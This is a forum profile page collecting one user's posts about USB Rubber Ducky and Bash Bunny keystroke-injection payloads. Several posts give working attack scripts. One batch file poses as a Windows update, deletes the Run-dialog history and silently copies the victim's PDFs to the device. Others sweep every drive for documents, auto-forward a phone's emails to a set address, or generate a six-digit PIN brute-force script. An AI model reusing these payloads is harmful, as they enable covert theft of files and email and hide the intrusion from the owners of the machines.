Jump to content

Cribbit

Active Members
  • Posts

    28
  • Joined

  • Last visited

  • Days Won

    2

Everything posted by Cribbit

  1. Hi PoSHMagiC0de Have not been on the forums for a bit. Your BBTPS looks really interesting with the ability to run multi payloads/jobs and SMB sever. Thanks for the idea's. If I find time i may do something with this script. Whats is it When your a kid you have time but no money. When you work you have money but no time. and if you're in a dead end job you have no time or money. 😉
  2. Spywll this must be a bug. Hopefully the Hak5 team are working on this for 1.4. after all if you are quacking a number you want a number. And you can stop a large proportion of payloads working just by turning NumLock off. @Darren Kitchen (sorry to ping you but just bring this issue to your attention)
  3. I don't know if this will be any use to anyone but. i create a poc to demonstrate sending the a status/progress of a powershell script to the bunny. The ps only send number 1,2 (3or4) & 5 with sleeps in between. And the bunny just changes it's LED depending on the number. when it get a 5 it quack the command to closes the powershell windows. #!/bin/bash trap "kill 0" EXIT LED SETUP ATTACKMODE RNDIS_ETHERNET HID GET SWITCH_POSITION GET HOST_IP cd /root/udisk/payloads/$SWITCH_POSITION/ FILE=data.txt #Clear old commands if [ -f "$FILE" ]; then cat /dev/null > "$FILE" fi LED SPECIAL # Set up an echo command to right to file. # using echo as nc only finish writing when the connection closes. CMD="while true; do read i && echo \$i >> $FILE ; done" # set nc to run in its own process nc -lvn -p 8080 -c "$CMD" & # give nc time to start sleep 1 # set the last command to empty last=""; LED ATTACK Q DELAY 200 RUN WIN "powershell" Q DELAY 100 # Create a connect object Q STRING "\$client = New-Object System.Net.Sockets.TcpClient;" Q DELAY 100 # set the host and port and connect to nc Q STRING "\$client.Connect(\"$HOST_IP\",8080);" Q DELAY 100 # create a stream for that connection Q STRING "\$stream = new-object System.IO.StreamWriter \$client.GetStream();" Q DELAY 100 # get powershell to sleep Q STRING "Start-Sleep -Seconds 3;" Q DELAY 100 # the 1 the the stream Q STRING "\$stream.WriteLine(\"1\");" Q DELAY 100 # push this over to nc Q STRING "\$stream.Flush();" Q DELAY 100 Q STRING "Start-Sleep -Seconds 3;" Q DELAY 100 Q STRING "\$stream.WriteLine(\"2\");" Q DELAY 100 Q STRING "\$stream.Flush();" Q DELAY 100 Q STRING "Start-Sleep -Seconds 3;" Q DELAY 200 # Send a 3 or 4 Q STRING "\$stream.WriteLine((3+(Get-Random -Maximum 2)).ToString());" Q DELAY 100 Q STRING "\$stream.Flush();" Q DELAY 100 Q STRING "Start-Sleep -Seconds 3;" Q DELAY 100 Q STRING "\$stream.WriteLine(\"5\");" Q DELAY 100 Q STRING "\$stream.Flush();" Q DELAY 100 #Close connection Q STRING "\$client.Close();" Q DELAY 100 Q ENTER LED SPECIAL # forever loop while : do # get the last line of the file removing line feeds (10) and carriage returns (13) curr=$(tail -1 "$FILE" | tr -d '\r\n') #curr=$(tail -1 "$FILE" | sed -e 's/[\r\n]//g') # see if the last command is different to the curr command if [ "$last" != "$curr" ] ; then # set the last to the current command last="$curr" # go to the section based on the command # most just change led color and rate on flashing. case $curr in 1) LED STAGE1;; 2) LED SPECIAL2;; 3) LED STAGE3;; 4) LED STAGE4;; 5) LED SPECIAL5 Q DELAY 100 # close powershell Q STRING "exit" Q ENTER break;; esac fi done LED FINISH sleep 1 The powershell is all on different lines just to make it easy to read. As i said don't know if this will of any uses to anyone but it may you never know may spark an idea in someone else
  4. Is num lock on i had this trouble. For some reason when I do a QUACK STRING “8” it send the KEYPAD 8 (00,00,60) not the top row 8 (00,00,25) and if Num lock is off getting the UP ARROW
  5. @rcanpolat glad its working. The firmware has never been updated to my knowledge. Even on the hak5 download page it's still 1.0 https://downloads.hak5.org/ducky
  6. If you have access to Linux/Bash you could use it to generate the ducky script you want: echo {000000..999999} | xargs -n 1 echo GUI r$'\n'DELAY 100$'\n'STRING C:\\app\\software\\app.exe$'\n'ENTER$'\n'DELAY 1000$'\n'STRING | sed '0~6 s/$/\nENTER\nENTER/g'>Ducky.txt It will take some time to execute.
  7. Probably not as many manufacturers add/remove shortcuts Here are the shortcuts for a Samsung don't know how many are generic to Android: Home screen: Apps list - Alt + A System: Home - GUI + Enter Back - GUI + Backspace Recent - Alt + Tab Notifications - GUI + N Keyboard shortcuts - GUI + / Lock Screen - GUI + L Switch Languages - SHIFT + SPACE Switch Languages - CTRL + SPACE Switch Languages - LEFT ALT + SHIFT Start/Exit DeX mode GUI + W Applications: Browser - GUI + B Contacts - GUI + C Email - GUI + E Messages - GUI + S Music - GUI + P Calendar - GUI + K
  8. Hi @sputnik-1, There is no loop for the ducky there is for the bash bunny. but there is a payload already created for this. you should watch episode 1217.1 and .2
  9. the Fees you have to pay are Import tax and VAT (plus handling charges for the delivery company, if they do the taxes). https://www.gov.uk/goods-sent-from-abroad
  10. I was playing around with the ducky and an android phone and wrote a payload to forward an email to the address specified. There are two version one for Gmail and one for Samsung Email. Use GUI + E to find your default app. I put a comment in for a loop so if you wish to forward more than one. GMAIL: REM Forwards the first email in the primary section REM Only works for phones. REM Does not work tablets as menu bar stops tabs REM GMAIL SHORTCUTS https://support.google.com/mail/answer/6594?co=GENIE.Platform%3DAndroid&hl=en&oco=1 DELAY 1000 GUI e DELAY 1000 TAB DELAY 500 TAB DELAY 500 ENTER REM LOOP FROM HERE DELAY 500 CTRL r DELAY 1000 TAB DELAY 500 SHIFT TAB DELAY 500 BACKSPACE DELAY 500 STRING your@email.com CTRL ENTER DELAY 1000 REM Moves to the next email RIGHTARROW REM GOTO LOOP SAMSUNG: REM Forwards the first email DELAY 1000 GUI e DELAY 1000 TAB DELAY 500 TAB DELAY 500 TAB DELAY 500 TAB DELAY 500 ENTER REM LOOP FROM HERE DELAY 500 SHIFT TAB DELAY 500 LEFTARROW LEFTARROW LEFTARROW LEFTARROW RIGHTARROW RIGHTARROW ENTER DELAY 500 STRING your@email.com DELAY 500 SHIFT TAB DELAY 500 SHIFT TAB DELAY 500 ENTER DELAY 500 REM Moves to the next email TAB RIGHTARROW RIGHTARROW LEFTARROW ENTER REM GOTO LOOP
  11. Hi, Just wondering if we are going to get Ducky 2.0 for the Ducky? So we can get the hold functions etc Also just a suggestion can we get a USB-C version as laptop seem to be dropping all port but C. or something like the SanDisk Ultra Dual Drive that has USB-A at one end and USB-C at the other.
  12. It would also be good if it could also act as a sound card / headphone out. So one it would suppress the response, then other people in the room would not get wise. The audio could also be save to a file and analysed for correct responses. But you could also send data over the audio channel(s) (like in the air-gap episode with minimodem). For example if the sysadmins had a no USB disk mounting configuration.
  13. Hi, Properly not as the computer needs to recognise it before it can work. But there are media keyboard buttons defined in the encoder. Two which may be of interest too you are (MEDIA_MUTE or MUTE) and (MEDIA_VOLUME_DEC or VOLUMEDOWN). The reason for two names for each is the second is an alias. You could give them a go and see.
  14. Cribbit

    Hak5 Gear

    Are you talking about the shoulder bag? I know one of the authorized resellers sells them fonefunshop in the UK, but they are expensive! And you can get something similar if you search online much cheaper but it will not have the Hak5 logo's on it. https://www.fonefunshop.com/specialist-products/hak5/hak5-tactical-edc-bag-every-day-carry-shoulder-bag.html https://shop.hak5.org/pages/authorized-resellers
  15. I think you just need parental control software. Which can be installed on PC's (and phones). You'll have to check if the are legal to uses where you live. https://www.techradar.com/best/parental-control
  16. I don't think there is any documentation but the code for the encoder is open source: https://github.com/hak5darren/USB-Rubber-Ducky/blob/master/Encoder/src/Encoder.java
  17. REM Copys the contents of c.txt on the root of the ducky to the clipboard REM Follow the step in the link below to set up Ducky REM https://docs.hak5.org/hc/en-us/articles/360010555213-Stealing-Files-with-the-USB-Rubber-Ducky-USB-Exfiltration-Explained DELAY 1000 GUI r DELAY 100 STRING powershell ".(Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''_''').Name+'c.txt')))" ENTER
  18. Hey ebmar, it most likely depends on how lock down you system is. But I suggest you watch episode 2112/2113 “Stealing Files with the USB Rubber Ducky”. Instead of copy a file too the ducky, copy it from the ducky. Then open it in note pad then ctrl-a and ctrl-c it. You’ll need to install the twin duck firmware. Hope this help getting you started.
  19. Just throwing this out as an idea for a new device emulation for the bash bunny a USB microphone. With a new command to play an audio file stored on it. So you could plug it in to a smart device and in you audio file you have a voice say “Hey Google/Alexa/Siri/Cortana go to this site”, “Order 500 copy of ...” or “set alarm for 2am”.
  20. There are probably a few ways to do this. Code below is untested on a ducky REM Get all drive letters, skips name lable FOR /F "skip=1" %%A IN ('wmic logicaldisk get name') DO ( REM Check drive is not the ducky IF %%~dA NEQ %~d0 ( REM COPY FILE xcopy /C /Q /G /Y /S %%A\*.pdf %dst% >>nul ) ) or REM Get all drive letters, skips name lable FOR /F "skip=1" %%A IN ('wmic logicaldisk get name') DO ( REM Check drive is not the ducky IF %%~dA NEQ %~d0 ( REM Call dir on each drive letter find files ending in .pdf or .xlsx FOR /F "delims==" %%I IN ('dir %%A\ /s /b /a-d ^| findstr /ile ".pdf .xlsx"') DO ( REM COPY FILE xcopy /C /Q /G /Y %%I %dst% >>nul ) ) ) Hope this helps
  21. Hi Sinkinson, I don't know if it would be any fast but you could give it a go. Test code: SET maxsize=10485760 FOR /F "delims==" %%A IN ('dir %USERPROFILE%\Documents\ /s /b ^| find /i ".pdf"') DO ( IF %%~zA LSS %maxsize% ( ECHO %%A is LESS at %%~zA ) ELSE ( ECHO %%A is MORE at %%~zA ) ) Code below untested Too copy file less then 10MB: SET maxsize=10485760 FOR /F "delims==" %%A IN ('dir %USERPROFILE%\Documents\ /s /b ^| find /i ".pdf"') DO ( IF %%~zA LSS %maxsize% ( xcopy /C /Q /G /Y /S %%A %dst% >>nul ) ) To copy all pdf on the system (but you will most like run in to issue with privileges): SET maxsize=10485760 FOR /R %%I in (*.pdf) do IF %%~zI LSS %maxsize% ( xcopy /C /Q /G /Y /S %%I %dst% >>nul ) Maxsize is in bytes Have not tested in on a duck as my ducky has not got the twin duck firmware on it. so you may need to changes some bit to get it to work Hope this helps
  22. Hi, the copy file code got me thinking when it laid out the file structure. That you could get the ducky to list out and save the the complete file structure and file names. Which could be use later to better target files to copy. I modified the e.cmd with the command: FOR /F %%A IN ('wmic logicaldisk get name') DO IF NOT "%%A" == "Name" (Tree /F /A %%A\ >> %dst%\drivetree.txt)
  23. They have released the notes now: Stealing files with the usb rubber ducky usb exfiltration explained
  24. Hi, I have not flashed my ducky so have not tested the code, but it looks like it's all there. e.cmd @echo off @echo Installing Windows Update REM Delete registry keys storing Run dislog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-7,2%%date:~-10,2%_%time:~0,2%%time:~3,2%%time:~6,2% mkdir %dst% >> nul if Exist %USERPROFILE%\Documents ( REM /C Continues copuing even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted file to destination that does not support encryption. REM /Y Suppresses prompting to confrim you want to overwrite an existing destination file REM /S Copies directories and subdirectories except empty ones. REM /E Copies directories and subdirectories. Including empty ones. REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >> nul REM Same as above but does not create empty directories xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >> nul ) start /b /wait powershell.exe -nologo -WindowsStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');" I was playing around with the %time% a little so you may want to change them back
  25. You could try running from source in the src/ folder you should have something like Encoder.java from the command line type: javac -g Encoder.java this will generate a class file then type: java Encoder and in should print out the help, then use like the jar (just without the -jar): java Encoder -i input.txt -o inject.bin -l no.properties
×
×
  • Create New...